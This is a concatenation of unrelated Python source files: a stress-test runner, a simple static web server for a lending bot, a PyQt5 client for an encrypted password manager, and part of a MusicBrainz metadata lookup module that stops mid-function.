help="Number of threads to create for concurrent testing", default=2)
parser.add_argument("-d", "--debug", action="store_true", dest="print_debug",
help="Whether or not to print debugging")
parser.add_argument('--xml', action="store_true", default=False)
parser.add_argument('--tests', nargs='+', default= ["EbsStress","GenerateCloudStatistics","EbsBotoStress","GenerateCloudStatistics"])
parser.add_argument('unittest_args', nargs='*')
## Grab arguments passed via commandline
options = parser.parse_args()
sys.argv[1:] = options.unittest_args
return options
if __name__ == "__main__":
## If given command line arguments, use them as test names to launch
options = get_options()
for test in options.tests:
if options.xml:
file = open("test-" + test + "result.xml", "w")
result = xmlrunner.XMLTestRunner(file).run(LoadGenerator(test))
else:
result = unittest.TextTestRunner(verbosity=2).run(LoadGenerator(test))
if result.wasSuccessful():
pass
else:
exit(1)
|
WebServer.py
|
# coding=utf-8
import threading
import os
server = None
web_server_ip = "0.0.0.0"
web_server_port = "8000"
web_server_template = "www"
def initialize_web_server(config):
'''
Setup the web server, retrieving the configuration parameters
and starting the web server thread
'''
global web_server_ip, web_server_port, web_server_template
# Check for custom web server address
compositeWebServerAddress = config.get('BOT', 'customWebServerAddress', '0.0.0.0').split(":")
# associate web server ip address
web_server_ip = compositeWebServerAddress[0]
# check for IP:PORT legacy format
if (len(compositeWebServerAddress) > 1):
# associate web server port
web_server_port = compositeWebServerAddress[1]
else:
# Check for custom web server port
web_server_port = config.get('BOT', 'customWebServerPort', '8000')
# Check for custom web server template
web_server_template = config.get('BOT', 'customWebServerTemplate', 'www')
print('Starting WebServer at {0} on port {1} with template {2}'
.format(web_server_ip, web_server_port, web_server_template))
thread = threading.Thread(target=start_web_server)
thread.deamon = True
thread.start()
def start_web_server():
'''
Start the web server
'''
import SimpleHTTPServer
import SocketServer
import socket
try:
port = int(web_server_port)
host = web_server_ip
# Do not attempt to fix code warnings in the below class, it is perfect.
class QuietHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
real_server_path = os.path.abspath(web_server_template)
# quiet server logs
def log_message(self, format, *args):
return
# serve from web_server_template folder under current working dir
def translate_path(self, path):
return SimpleHTTPServer.SimpleHTTPRequestHandler.translate_path(self, '/' + web_server_template + path)
def send_head(self):
local_path = self.translate_path(self.path)
if os.path.commonprefix((os.path.abspath(local_path), self.real_server_path)) != self.real_server_path:
self.send_error(404, "These aren't the droids you're looking for")
return None
return SimpleHTTPServer.SimpleHTTPRequestHandler.send_head(self)
global server
SocketServer.TCPServer.allow_reuse_address = True
server = SocketServer.TCPServer((host, port), QuietHandler)
if host == "0.0.0.0":
# Get all addresses that we could listen on the port specified
addresses = [i[4][0] for i in socket.getaddrinfo(socket.gethostname().split('.')[0], port)]
addresses = [i for i in addresses if ':' not in i] # Filter out all IPv6 addresses
addresses.append('127.0.0.1') # getaddrinfo doesn't always get localhost
hosts = list(set(addresses)) # Make list unique
else:
hosts = [host]
serving_msg = "http://{0}:{1}/lendingbot.html".format(hosts[0], port)
for host in hosts[1:]:
serving_msg += ", http://{0}:{1}/lendingbot.html".format(host, port)
print('Started WebServer, lendingbot status available at {0}'.format(serving_msg))
server.serve_forever()
except Exception as ex:
ex.message = ex.message if ex.message else str(ex)
print('Failed to start WebServer: {0}'.format(ex.message))
def stop_web_server():
'''
Stop the web server
'''
try:
print("Stopping WebServer")
threading.Thread(target=server.shutdown).start()
except Exception as ex:
ex.message = ex.message if ex.message else str(ex)
print("Failed to stop WebServer: {0}".format(ex.message))
|
ui.py
|
#!/usr/bin/python3
import sys, os
import signal
if getattr(sys, "frozen", False):
print(sys._MEIPASS)
from PyQt5.QtCore import pyqtProperty, QObject, QUrl, pyqtSlot, pyqtSignal
from PyQt5.QtCore import QAbstractListModel, QSortFilterProxyModel, QTimer
from PyQt5.QtGui import QGuiApplication, QClipboard, QIcon
from PyQt5.QtQml import (
qmlRegisterType,
QQmlComponent,
QQmlEngine,
QQmlApplicationEngine,
)
import threading
import client
import traceback
import crypto
import json
import time
import datetime
def addField(v, d, field):
if field in d:
v = v + str(d[field])
return v
def makeSortString(d):
ret = ""
if "website" in d and d["website"] is not None and len(d["website"]) > 0:
ret = addField(ret, d, "website").replace("www.", "")
elif "address" in d and d["address"] is not None and len(d["address"]) > 0:
ret = addField(ret, d, "address").replace("www.", "")
else:
ret = "zzz_"
ret = ret + " __ "
ret = addField(ret, d, "loginName")
ret = ret.upper()
return ret
def makeSearchString(d):
ret = ""
if "website" in d:
ret = " " + addField(ret, d, "website").replace("www.", "")
if "address" in d:
ret = " " + addField(ret, d, "address").replace("www.", "")
ret = " " + addField(ret, d, "loginName")
ret = " " + addField(ret, d, "notes")
return ret.lower()
class Session:
def __init__(self):
self.clearSession()
def clearSession(self):
self._url = None
self._user = None
self._password = None
self._encryptedPrivateKey = None
self._authToken = None
self.client = None
self._privKey = None
self._secrets = None
self._passwords = []
self._passwordsModCounter = 0
self._lock = threading.Lock()
self._categories = {}
self._categoriesList = []
self._users = {}
self._categorySid = None
class PasswordInfo(QObject):
sigChanged = pyqtSignal(name="passwordInfoChanged")
def __init__(self, parent=None):
super().__init__(parent)
self._sid = None
@pyqtProperty("QString", notify=sigChanged)
def sid(self):
return self._sid
@sid.setter
def sid(self, sid):
print("Setting sid=" + sid)
self._sid = sid
for password in Midtier.session._passwords:
if "sid" in password and sid == password["sid"]:
self._password = password
print("Emitting changed signal")
self.sigChanged.emit()
@pyqtProperty("QString", notify=sigChanged)
def category(self):
try:
return str(self._password["category"])
except:
return "0"
@pyqtProperty("QString", notify=sigChanged)
def categoryLabel(self):
try:
return self._password["categoryLabel"]
except:
return "Unknown"
@pyqtProperty("QString", notify=sigChanged)
def categoryBackground(self):
try:
return self._password["categoryBackground"]
except:
return "#000000"
@pyqtProperty("QString", notify=sigChanged)
def categoryForeground(self):
try:
return self._password["categoryForeground"]
except:
return "#FFFFFF"
@pyqtProperty("QString", notify=sigChanged)
def displayName(self):
try:
return self._password["displayName"]
except:
return ""
@pyqtProperty("QString", notify=sigChanged)
def website(self):
try:
return self._password["website"]
except:
try:
return self._password["address"]
except:
return ""
@pyqtProperty("QString", notify=sigChanged)
def address(self):
try:
return self._password["address"]
except:
try:
return self._password["website"]
except:
return ""
@pyqtProperty(bool, notify=sigChanged)
def passwordHasNumbers(self):
try:
return any(char.isdigit() for char in self._password["password"])
except:
return False
@pyqtProperty(bool, notify=sigChanged)
def passwordHasUpper(self):
try:
return any(char.isupper() for char in self._password["password"])
except:
return False
@pyqtProperty(bool, notify=sigChanged)
def passwordHasLower(self):
try:
return any(char.islower() for char in self._password["password"])
except:
return False
@pyqtProperty(bool, notify=sigChanged)
def passwordHasSpecial(self):
try:
return any(not char.isalnum() for char in self._password["password"])
except:
return False
@pyqtProperty("QString", notify=sigChanged)
def password(self):
try:
return self._password["password"]
except:
return ""
@pyqtProperty("QString", notify=sigChanged)
def passwordStars(self):
try:
return ("*" * 8) + "{" + str(len(self._password["password"])) + "}"
except:
return ""
@pyqtProperty("QString", notify=sigChanged)
def loginName(self):
try:
return self._password["loginName"]
except:
return ""
@pyqtProperty("QString", notify=sigChanged)
def dateChanged(self):
try:
return self._password["dateChanged"]
except:
return ""
@pyqtProperty("QString", notify=sigChanged)
def notes(self):
try:
return self._password["notes"]
except:
return ""
class PasswordModel(QAbstractListModel):
def __init__(self, parent=None):
super().__init__(parent)
self._modCounter = 0
self._data = []
def rowCount(self, parent):
return len(self._getdata())
def data(self, index, role):
ret = self._getdata()[index.row()]
if role == 1:
ret = makeSearchString(ret)
# print("data("+str(index.row())+","+str(role)+")="+str(ret))
return ret
def _getdata(self):
with Midtier.session._lock:
if self._modCounter < Midtier.session._passwordsModCounter:
print(
"Refreshing model from "
+ str(self._modCounter)
+ " to "
+ str(Midtier.session._passwordsModCounter)
)
self._modCounter = Midtier.session._passwordsModCounter
self._data = sorted(
Midtier.session._passwords, key=lambda x: makeSortString(x)
)
return self._data
class MyProxyModel(QSortFilterProxyModel):
def __init__(self, parent=None):
super().__init__(parent)
self.setSourceModel(PasswordModel(parent))
self.setDynamicSortFilter(True)
self.setFilterRegExp("")
self.setFilterRole(1)
@pyqtProperty("QString")
def filterString(self):
return self.filterRegExp().pattern()
@filterString.setter
def filterString(self, f):
self.setFilterRegExp(f.lower())
class MyCategoryProxyModel(QSortFilterProxyModel):
def __init__(self, parent=None):
super().__init__(parent)
self.setSourceModel(CategoryModel(parent))
self.setDynamicSortFilter(True)
class Midtier(QObject):
error = pyqtSignal(str, arguments=["error"])
sigMessage = pyqtSignal(str, name="message", arguments=["message"])
sigDownloadKey = pyqtSignal(
str, name="downloadKey", arguments=["encryptedPrivateKey"]
)
sigDownloadSecrets = pyqtSignal(name="downloadSecrets")
sigDecryptedSecret = pyqtSignal(dict, name="decryptedSecret")
sigNewPassword = pyqtSignal(str, name="newPassword", arguments=["sid"])
sigUpdatedPassword = pyqtSignal(str, name="updatedPassword", arguments=["sid"])
sigNewCategory = pyqtSignal(str, name="newCategory", arguments=["cid"])
sigUsersListed = pyqtSignal(name="usersListed")
def __init__(self, parent=None):
super().__init__(parent)
self.helper = client.ClientHelper()
self.crypto = crypto.Crypto()
self.model = PasswordModel(self)
@pyqtProperty("QString")
def url(self):
return Midtier.session._url
@url.setter
def url(self, url):
Midtier.session._url = url
@pyqtProperty("QString")
def user(self):
return Midtier.session._user
@user.setter
def user(self, user):
Midtier.session._user = user
@pyqtProperty("QString")
def password(self):
return Midtier.session._password
@password.setter
def password(self, password):
Midtier.session._password = password
@pyqtProperty("QString")
def authToken(self):
return Midtier.session._authToken
@authToken.setter
def authToken(self, authToken):
Midtier.session._authToken = authToken
@pyqtProperty("QString")
def encryptedPrivateKey(self):
return Midtier.session._encryptedPrivateKey
@encryptedPrivateKey.setter
def encryptedPrivateKey(self, encryptedPrivateKey):
Midtier.session._encryptedPrivateKey = encryptedPrivateKey
@pyqtSlot()
def clearSession(self):
Midtier.session = Session()
self.sigMessage.emit("")
@pyqtProperty("QVariant")
def categories(self):
return sorted(Midtier.session._categoriesList, key=lambda x: x["text"])
@pyqtProperty("QVariant")
def otherUsers(self):
other = []
for username in Midtier.session._users.keys():
if username != Midtier.session._user:
other.append(
{
"username": username,
"name": Midtier.session._users[username]["displayName"],
}
)
print("userUsers=" + str(other))
return other
@pyqtSlot()
def getSecrets(self):
threading.Thread(target=(lambda: self._getSecrets())).start()
def _getSecrets(self):
try:
Midtier.session.client = client.Client(
client.ClientRestInterface(Midtier.session._url)
)
if self._login():
self.sigMessage.emit("Generating token")
Midtier.session._authToken = self.helper.generateToken(
Midtier.session._privKey
)
Midtier.session.client.login(
Midtier.session._user, Midtier.session._authToken
)
self.sigMessage.emit("Downloading secrets")
Midtier.session._secrets = Midtier.session.client.getSecretsForUser(
Midtier.session._user
)
self.sigMessage.emit("Finished downloading secrets")
self.sigDownloadSecrets.emit()
except Exception as e:
traceback.print_exc()
self.sigMessage.emit("")
self.error.emit(str(e))
@pyqtSlot(str)
def addPassword(self, value):
print("addPassword()")
threading.Thread(target=(lambda: self._addPassword(value))).start()
def _addPassword(self, value):
try:
obj = json.loads(value)
print(str(obj))
user = Midtier.session._user
self.sigMessage.emit("Downloading public key")
self._yield()
pubKey = Midtier.session.client.getUserPublicKey(user)
self.sigMessage.emit("Generating random keys")
self._yield()
aesKey = self.crypto.generateRandomKey()
hmacKey = self.crypto.generateRandomKey()
bothKeys = aesKey + hmacKey
rnd = self.crypto.encode(self.crypto.generateRandomKey())
secretValue = {}
secretValue["random"] = rnd
secretValue["website"] = obj["website"]
secretValue["address"] = obj["url"]
secretValue["loginName"] = obj["username"]
secretValue["password"] = obj["password"]
secretValue["type"] = "password"
secretValue["category"] = "0"
secretValue["userCategory"] = {}
for cat in Midtier.session._categoriesList:
try:
if cat["text"] == obj["category"]:
secretValue["category"] = cat["id"]
secretValue["userCategory"][user] = cat["id"]
except:
pass
secretValue["notes"] = ""
secretValue["dateChanged"] = datetime.date.today().isoformat()
self.sigMessage.emit("Encrypting password")
self._yield()
encryptedSecret = self.crypto.encrypt(aesKey, json.dumps(secretValue))
encryptedKey = self.crypto.encryptRSA(pubKey, bothKeys)
hmac = str(self.crypto.createHmac(hmacKey, encryptedSecret))
eek = str(self.crypto.encode(encryptedKey))
self.sigMessage.emit("Uploading encrypted password")
self._yield()
secret = Midtier.session.client.addSecret(
user, "1", eek, encryptedSecret, hmac
)
sid = secret["sid"]
secretValue["sid"] = sid
print("Secret ID: " + str(sid))
self.sigMessage.emit("Successfully uploaded encrypted password")
with Midtier.session._lock:
self.updatePasswordCategoryInfo(secretValue)
Midtier.session._passwords.append(secretValue)
Midtier.session._passwordsModCounter += 1
self.sigNewPassword.emit(sid)
except Exception as e:
traceback.print_exc()
self.sigMessage.emit("")
self.error.emit(str(e))
@pyqtSlot(str, str)
def updatePassword(self, sid, value):
print("updatePassword()")
threading.Thread(target=(lambda: self._updatePassword(sid, value))).start()
def _updatePassword(self, sid, value):
try:
obj = json.loads(value)
print(str(obj))
user = Midtier.session._user
privKey = Midtier.session._privKey
self.sigMessage.emit("Downloading public key")
self._yield()
pubKey = Midtier.session.client.getUserPublicKey(user)
self.sigMessage.emit("Downloading latest secret")
self._yield()
secretEntry = Midtier.session.client.getSecret(sid)
encryptedKey = self.crypto.decode(
secretEntry["users"][Midtier.session._user]["encryptedKey"]
)
encryptedSecret = secretEntry["encryptedSecret"]
self.sigMessage.emit("Decrypting the AES key")
origKeyPair = self.crypto.decryptRSA(privKey, encryptedKey)
origKey = origKeyPair[0:32]
hmacKey = origKeyPair[32:]
origSecretText = self.crypto.decrypt(origKey, encryptedSecret)
origSecret = json.loads(origSecretText.decode("utf-8"))
secretValue = origSecret
secretValue["website"] = obj["website"]
secretValue["address"] = obj["url"]
secretValue["loginName"] = obj["username"]
if secretValue["password"] != obj["password"]:
secretValue["password"] = obj["password"]
secretValue["dateChanged"] = datetime.date.today().isoformat()
for cat in Midtier.session._categoriesList:
try:
if cat["text"] == obj["category"]:
secretValue["category"] = cat["id"]
secretValue["userCategory"][user] = cat["id"]
except:
pass
self.sigMessage.emit("Encrypting password")
self._yield()
encryptedSecret = self.crypto.encrypt(origKey, json.dumps(secretValue))
hmac = str(self.crypto.createHmac(hmacKey, encryptedSecret))
self.sigMessage.emit("Uploading encrypted secret")
self._yield()
Midtier.session.client.updateSecret(
sid, encryptedSecret, hmac
)
self.sigMessage.emit("Uploaded encrypted secret")
self.sigMessage.emit("Updating information")
with Midtier.session._lock:
for password in Midtier.session._passwords:
if "sid" in password and password["sid"] == sid:
self.updatePasswordCategoryInfo(password)
password["website"] = obj["website"]
password["address"] = obj["url"]
password["loginName"] = obj["username"]
password["password"] = obj["password"]
if "dateChanged" in secretValue:
password["dateChanged"] = secretValue["dateChanged"]
Midtier.session._passwords.append(secretValue)
Midtier.session._passwordsModCounter += 1
self.sigUpdatedPassword.emit(sid)
except Exception as e:
traceback.print_exc()
self.sigMessage.emit("")
self.error.emit(str(e))
@pyqtSlot(str)
def addCategory(self, value):
print("addCategory()")
threading.Thread(target=(lambda: self._addCategory(value))).start()
# Midtier.session._categorySid
def _addCategory(self, value):
try:
obj = json.loads(value)
print(str(obj))
sid = Midtier.session._categorySid
user = Midtier.session._user
privKey = Midtier.session._privKey
self.sigMessage.emit("Downloading public key")
pubKey = Midtier.session.client.getUserPublicKey(user)
if sid == None:
print("Creating category secret")
self.sigMessage.emit("Generating random keys")
self._yield()
aesKey = self.crypto.generateRandomKey()
hmacKey = self.crypto.generateRandomKey()
bothKeys = aesKey + hmacKey
rnd = self.crypto.encode(self.crypto.generateRandomKey())
secretValue = {}
secretValue["type"] = "passwordCategories"
secretValue["categories"] = {}
secretValue["categories"]["1"] = {}
secretValue["categories"]["1"]["label"] = obj["label"]
secretValue["categories"]["1"]["backgroundColor"] = str(
obj["background"]
).replace("#", "")
self.sigMessage.emit("Encrypting category")
self._yield()
encryptedSecret = self.crypto.encrypt(aesKey, json.dumps(secretValue))
encryptedKey = self.crypto.encryptRSA(pubKey, bothKeys)
hmac = str(self.crypto.createHmac(hmacKey, encryptedSecret))
eek = str(self.crypto.encode(encryptedKey))
self.sigMessage.emit("Uploading encrypted category")
self._yield()
secret = Midtier.session.client.addSecret(
user, "1", eek, encryptedSecret.decode("utf-8"), hmac
)
Midtier.session._categorySid = secret["sid"]
print("New category sid: " + secret["sid"])
with Midtier.session._lock:
self._updateCategoryList(secretValue)
self.sigNewCategory.emit("1")
else:
client = Midtier.session.client
self.sigMessage.emit("Downloading latest secret")
secretEntry = client.getSecret(sid)
encryptedKey = self.crypto.decode(
secretEntry["users"][Midtier.session._user]["encryptedKey"]
)
encryptedSecret = secretEntry["encryptedSecret"]
self.sigMessage.emit("Decrypting the AES key")
origKeyPair = self.crypto.decryptRSA(privKey, encryptedKey)
origKey = origKeyPair[0:32]
hmacKey = origKeyPair[32:]
self.sigMessage.emit("Decrypting the latest secret")
origSecretText = self.crypto.decrypt(origKey, encryptedSecret)
origSecret = json.loads(origSecretText.decode("utf-8"))
newId = "1"
if "categories" in origSecret:
catIds = []
catIds.extend(origSecret["categories"].keys())
catIds = sorted(catIds, key=lambda x: int(x))
catIds.reverse()
highest = catIds[0]
newId = str(int(highest) + 1)
print(
"highest category is "
+ str(highest)
+ ", new id is "
+ str(newId)
)
origSecret["categories"][newId] = {}
origSecret["categories"][newId]["label"] = obj["label"]
origSecret["categories"][newId]["backgroundColor"] = str(
obj["background"]
).replace("#", "")
else:
origSecret["categories"] = {}
origSecret["categories"]["1"] = {}
origSecret["categories"]["1"]["label"] = obj["label"]
origSecret["categories"]["1"]["backgroundColor"] = str(
obj["background"]
).replace("#", "")
self.sigMessage.emit("Encrypting categories")
self._yield()
encryptedSecret = self.crypto.encrypt(origKey, json.dumps(origSecret))
hmac = str(self.crypto.createHmac(hmacKey, encryptedSecret))
self.sigMessage.emit("Uploading encrypted categories")
self._yield()
client.updateSecret(sid, encryptedSecret.decode("utf-8"), hmac)
self.sigMessage.emit("Uploaded encrypted categories")
with Midtier.session._lock:
self._updateCategoryList(origSecret)
self.sigNewCategory.emit(newId)
except Exception as e:
traceback.print_exc()
self.sigMessage.emit("")
self.error.emit(str(e))
@pyqtSlot(str, str)
def shareSecret(self, sid, username):
threading.Thread(target=(lambda: self._shareSecret(sid, username))).start()
def _shareSecret(self, sid, username):
try:
client = Midtier.session.client
self.sigMessage.emit("Downloading " + username + "'s public key")
pubKey = client.getUserPublicKey(username)
privKey = Midtier.session._privKey
self.sigMessage.emit("Downloading latest secret")
secretEntry = client.getSecret(sid)
encryptedKey = self.crypto.decode(
secretEntry["users"][Midtier.session._user]["encryptedKey"]
)
self.sigMessage.emit("Decrypting the AES key")
origKeyPair = self.crypto.decryptRSA(privKey, encryptedKey)
origKey = origKeyPair[0:32]
hmacKey = origKeyPair[32:]
self.sigMessage.emit("Encrypting the AES key for " + username)
encryptedKey2 = self.crypto.encryptRSA(pubKey, origKey)
self.sigMessage.emit("Sharing the secret " + username)
client.shareSecret(sid, username, self.crypto.encode(encryptedKey2))
self.sigMessage.emit("Shared the secret " + username)
except Exception as e:
traceback.print_exc()
self.sigMessage.emit("")
self.error.emit(str(e))
@pyqtSlot()
def decryptSecrets(self):
threading.Thread(target=(lambda: self._decryptSecrets())).start()
def _decryptSecrets(self):
self.sigMessage.emit("Decrypting secrets")
numSecrets = len(Midtier.session._secrets)
count = 0
user = Midtier.session._user
privKey = Midtier.session._privKey
failed = 0
for key in Midtier.session._secrets.keys():
count = count + 1
self.sigMessage.emit(
"Decrypting secret " + str(count + 1) + "/" + str(numSecrets)
)
try:
esecret = Midtier.session._secrets[key]
# print("key="+str(esecret))
if "users" in esecret and user in esecret["users"]:
encryptedKey = self.crypto.decode(
esecret["users"][user]["encryptedKey"]
)
encryptedSecret = esecret["encryptedSecret"]
origKeyPair = self.crypto.decryptRSA(privKey, encryptedKey)
origKey = origKeyPair[0:32]
origSecretText = self.crypto.decrypt(origKey, encryptedSecret)
origSecret = json.loads(origSecretText.decode("utf-8"))
origSecret["sid"] = key
# If the secret has the new format where each user specifies the category in a dict:
if "userCategory" in origSecret and user in origSecret["userCategory"]:
# print("before transform: "+json.dumps(origSecret,indent=2))
origSecret["category"] = origSecret["userCategory"][user]
if "type" in origSecret:
if origSecret["type"] == "password":
with Midtier.session._lock:
self.updatePasswordCategoryInfo(origSecret)
Midtier.session._passwords.append(origSecret)
Midtier.session._passwordsModCounter += 1
elif origSecret["type"] == "passwordCategories":
Midtier.session._categorySid = origSecret["sid"]
print(json.dumps(origSecret, indent=2))
if "categories" in origSecret:
with Midtier.session._lock:
self._updateCategoryList(origSecret)
else:
print(json.dumps(origSecret, indent=2))
self.sigDecryptedSecret.emit(origSecret)
if count % 10 == 0:
self._yield()
except:
failed = failed + 1
traceback.print_exc()
if failed == 1:
self.sigMessage.emit("Failed to deccrypt one secret")
elif failed > 1:
self.sigMessage.emit("Failed to deccrypt " + str(failed) + " secrets")
else:
self.sigMessage.emit("")
def _updateCategoryList(self, origSecret):
Midtier.session._categories = origSecret["categories"]
Midtier.session._categoriesList = []
for catId in Midtier.session._categories.keys():
catObj = {"id": catId}
catObj["text"] = Midtier.session._categories[catId]["label"]
catObj["foreground"] = self.getForegroundColor(
Midtier.session._categories[catId]["backgroundColor"]
)
catObj["background"] = (
"#" + Midtier.session._categories[catId]["backgroundColor"]
)
Midtier.session._categoriesList.append(catObj)
for password in Midtier.session._passwords:
self.updatePasswordCategoryInfo(password)
def updatePasswordCategoryInfo(self, password):
password["categoryLabel"] = "Unknown"
password["categoryBackground"] = "Transparent"
password["categoryForeground"] = "Transparent"
catInfo = None
if (
"category" in password
and password["category"] in Midtier.session._categories
):
catInfo = Midtier.session._categories[password["category"]]
if catInfo != None:
password["categoryBackground"] = "#" + catInfo["backgroundColor"].upper()
password["categoryLabel"] = catInfo["label"]
password["categoryForeground"] = self.getForegroundColor(
catInfo["backgroundColor"]
)
@pyqtSlot()
def downloadPrivateKey(self):
threading.Thread(target=(lambda: self._downloadPrivateKey())).start()
def _downloadPrivateKey(self):
try:
self.sigMessage.emit("Logging in with password")
Midtier.session.client = client.Client(
client.ClientRestInterface(Midtier.session._url)
)
Midtier.session.client.login(
Midtier.session._user, Midtier.session._password
)
Midtier.session._encryptedPrivateKey = Midtier.session.client.getUserPrivateKey(
Midtier.session._user, Midtier.session._password
).decode(
"ascii"
)
self.sigDownloadKey.emit(Midtier.session._encryptedPrivateKey)
except Exception as e:
traceback.print_exc()
self.clearSession()
self.error.emit(str(e))
@pyqtSlot()
def listUsers(self):
print("listUsers()")
threading.Thread(target=(lambda: self._listUsers())).start()
def _listUsers(self):
try:
Midtier.session._users = Midtier.session.client.listUsers()
print("users=" + str(Midtier.session._users))
self.sigUsersListed.emit()
except Exception as e:
traceback.print_exc()
self.clearSession()
self.error.emit(str(e))
@pyqtSlot()
def login(self):
threading.Thread(target=(lambda: self._login())).start()
def _login(self):
try:
Midtier.session._privKey = self.helper.decryptPrivateKey(
Midtier.session._user,
Midtier.session._encryptedPrivateKey,
Midtier.session._password,
)
return True
except Exception as e:
traceback.print_exc()
self.clearSession()
self.error.emit(str(e))
return False
@pyqtSlot(str)
def updateClipboard(self, value):
QGuiApplication.clipboard().setText(value)
QGuiApplication.clipboard().setText(value, QClipboard.Selection)
self.sigMessage.emit("Copied to clipboard")
def _yield(self):
# Release the GIL
time.sleep(0.1)
def getForegroundColor(self, bg):
# http://stackoverflow.com/questions/1855884/determine-font-color-based-on-background-color
# Counting the perceptive luminance - human eye favors green color...
bg = str(bg).replace("#", "")
r = 0.299 * int(bg[1:3], 16)
g = 0.587 * int(bg[3:5], 16)
b = 0.114 * int(bg[5:8], 16)
a = 1.0 - ((r + g + b) / 255.0)
if a < 0.5:
return "#000000"
else:
return "#FFFFFF"
def sigint_handler(*args):
sys.stderr.write("\r")
QGuiApplication.quit()
if __name__ == "__main__":
signal.signal(signal.SIGINT, sigint_handler)
app = QGuiApplication(sys.argv)
# Get the interpreter to run so that the signal handler will actually
# execute when the user hits control-c
# https://stackoverflow.com/questions/4938723/what-is-the-correct-way-to-make-my-pyqt-application-quit-when-killed-from-the-co
timer = QTimer()
timer.start(500) # You may change this if you wish.
timer.timeout.connect(lambda: None) # Let the interpreter run each 500 ms.
# Get the correct basepath in all scenarios
if getattr(sys, "frozen", False):
basepath = sys._MEIPASS
else:
basepath = os.path.dirname(os.path.realpath(__file__))
if len(basepath) == 0:
basepath = "."
basepath = os.path.abspath(basepath).replace("\\", "/")
if basepath.find(":") > 0:
basepath = "file:///" + basepath
qmlRegisterType(Midtier, "CPMQ", 1, 0, "Midtier")
qmlRegisterType(MyProxyModel, "CPMQ", 1, 0, "PasswordModel")
qmlRegisterType(PasswordInfo, "CPMQ", 1, 0, "PasswordInfo")
Midtier.session = Session()
# if os.name!='nt':
app.setWindowIcon(QIcon(basepath + "/ui/icon.png"))
print("Using icon: " + basepath + "/ui/icon.png")
# else:
# app.setWindowIcon(QIcon(basepath + '/ui/icon.ico'))
# print("Using icon: "+basepath + '/ui/icon.ico')
engine = QQmlApplicationEngine()
# for the pyinstaller-extracted qml system imports
engine.addImportPath(basepath + "/_qml")
rootContext = engine.rootContext()
rootContext.setContextProperty("qmlBasePath", basepath + "/ui")
print("QML Import dirs: " + str(engine.importPathList()))
qmlFile = basepath + "/ui/main.qml"
print("Loading " + qmlFile)
engine.load(QUrl(qmlFile))
sys.exit(app.exec_())
|
musicBrainz.py
|
import json
import threading
from queue import Queue
from io import StringIO
from urllib import request
import arrow
import musicbrainzngs
from resources.common import *
from searchEngines.searchEngineBase import SearchEngineBase, ThreadData
from searchEngines.models.Artist import Artist, ArtistType
from searchEngines.models.Label import Label
from searchEngines.models.Release import Release
from searchEngines.models.ReleaseLabel import ReleaseLabel
from searchEngines.models.ReleaseMedia import ReleaseMedia
from searchEngines.models.Track import Track
class MusicBrainz(SearchEngineBase):
IsActive = True
threadDataType = "musicBrainz"
lock = threading.Lock()
que = Queue()
cache = dict()
artistReleasesThreaded = []
def __init__(self, referer=None):
self.artists = {}
self.searchReleases = {}
self.releases = {}
SearchEngineBase.__init__(self, referer)
musicbrainzngs.set_useragent("Roadie", "0.1", self.referer)
def lookupArtist(self, name):
results = musicbrainzngs.search_artists(artist=name)
if results and 'artist-list' in results and results['artist-list']:
result = None
for artistResult in results['artist-list']:
if 'name' in artistResult:
if isEqual(artistResult['name'], name):
result = artistResult
break
if result:
return self.lookupArtistByMusicBrainzId(result['id'])
return None
def lookupArtistByMusicBrainzId(self, musicBrainzId, fetchReleases=False):
if not musicBrainzId:
raise RuntimeError("Invalid MusicBrainzId")
try:
artist = None
self.logger.debug("Performing MusicBrainz Lookup For Artist")
results = musicbrainzngs.get_artist_by_id(musicBrainzId, includes=['tags', 'aliases', 'url-rels'])
if results and results['artist']:
result = results['artist']
if result:
artist = Artist(name=result['name'])
artist.musicBrainzId = result['id']
artist.artistType = ArtistType.Person
if 'type' in result and isEqual(result['type'], "group"):
artist.artistType = ArtistType.Group
artist.sortName = result['sort-name']
if 'isni-list' in result:
artist.isniList = []
for isni in result['isni-list']:
if not isInList(artist.isniList, isni):
artist.isniList.append(isni)
if 'life-span' in result:
if 'begin' in result['life-span']:
artist.beginDate = result['life-span']['begin']
if 'end' in result['life-span']:
artist.endDate = result['life-span']['end']
if 'alias-list' in result:
artist.alternateNames = []
for alias in result['alias-list']:
aliasName = alias['alias']
if not isInList(artist.alternateNames, aliasName):
artist.alternateNames.append(aliasName)
if 'url-relation-list' in result:
artist.urls = []
for url in result['url-relation-list']:
target = url['target']
imageType = url['type']
if imageType != "image":
if not isInList(artist.urls, target):
artist.urls.append(target)
if 'tag-list' in result:
artist.tags = []
for tag in result['tag-list']:
if not isInList(artist.tags, tag['name']):
artist.tags.append(tag['name'])
if artist and fetchReleases:
artist.releases = self.lookupAllArtistsReleases(artist)
# print(artist.info())
return artist
except:
self.logger.exception("MusicBrainz: Error In LookupArtist")
pass
return None
def searchForRelease(self, artist, title):
try:
if artist.roadieId in self.cache and not title:
self.logger.debug(
"Found Artist: roadieId [" + artist.roadieId + "] name [" + artist.name + "] in MusicBrainz Cache.")
return self.cache[artist.roadieId]
if not artist.musicBrainzId:
artist = self.lookupArtist(artist.name)
if not artist or not artist.musicBrainzId:
return None
if artist.roadieId not in self.cache:
self.cache[artist.roadieId] = self.lookupAllArtistsReleases(artist)
else:
self.logger.debug(
"Found Artist: roadieId [" + artist.roadieId + "] name [" + artist.name + "] in MusicBrainz Cache.")
if title:
foundRelease = None
for release in self.cache[artist.roadieId]:
if isEqual(release.title, title):
foundRelease = release
break
if foundRelease:
releases = [foundRelease]
return releases
else:
return None
return self.cache[artist.roadieId]
except:
self.logger.exception("MusicBrainz: Error In LookupArtist")
pass
def lookupAllArtistsReleases(self, artist):
mbReleases = musicbrainzngs.browse_releases(artist=artist.musicBrainzId)
if mbReleases and 'release-list' in mbReleases:
for x in range(self.threadCount):
t = threading.Thread(target=self.threader)
t.daemon = True
t.start()
for mbRelease in mbReleases['release-list']:
self.que.put(ThreadData(self.threadDataType, mbRelease['id']))
self.que.join()
return self.artistReleasesThreaded
return None
def threader(self):
while True:
threadData = self.que.get()
if threadData.threadDataType == self.threadDataType:
self.threaderLookupRelease(threadData.data)
self.que.task_done()
def threaderLookupRelease(self, releaseMusicBrainzId):
release = self.lookupReleaseByMusicBrainzId(releaseMusicBrainzId)
if release:
with self.lock:
if release in self.artistReleasesThreaded:
for r in self.artistReleasesThreaded:
if r == release:
r.mergeWithRelease(release)
else:
self.artistReleasesThreaded.append(release)
def lookupReleaseByMusicBrainzId(self, musicBrainzId):
try:
if not musicBrainzId:
raise RuntimeError("Invalid MusicBrainzId")
release = None
